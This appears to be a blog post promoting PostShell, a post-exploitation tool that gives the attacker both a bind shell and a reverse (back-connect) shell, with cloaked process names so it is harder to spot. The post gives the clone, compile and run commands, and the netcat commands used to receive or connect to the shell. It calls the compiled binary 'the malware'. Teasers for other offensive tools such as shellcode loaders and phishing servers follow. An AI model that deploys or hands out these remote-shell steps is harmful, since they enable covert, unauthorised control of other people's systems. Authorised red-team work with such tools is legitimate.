PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system.
ScreenShots
Banner and interaction with shell after a connection is started.
Also Read – Metame : Metamorphic Code Engine For Arbitrary Executables
Why not use a traditional Backconnect/Bind Shell?
PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.
It also incorporates both a back connect and bind shell, meaning that if a target doesn’t allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.
PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.
Features
Getting Started
Downloading: git clone https://github.com/rek7/postshell
Compiling: cd postshell && sh compile.sh This should create a binary called “stub” this is the malware.
Commands
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Example Usage
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Recieving a Connection with Netcat
Recieving a backconnect:
$ nc -vlp port
Connecting to a bind Shell:
$ nc host port
ModTask is an advanced C# tool designed for red teaming operations, focusing on manipulating scheduled…
HellBunny is a malleable shellcode loader written in C and Assembly utilizing direct and indirect…
SharpRedirect is a simple .NET Framework-based redirector from a specified local port to a destination…
Flyphish is an Ansible playbook allowing cyber security consultants to deploy a phishing server in…
A crypto library to decrypt various encrypted D-Link firmware images. Confirmed to work on the…
LLMs (e.g., GPT-3.5, LLaMA, and PaLM) suffer from hallucination—fabricating non-existent facts to cheat users without…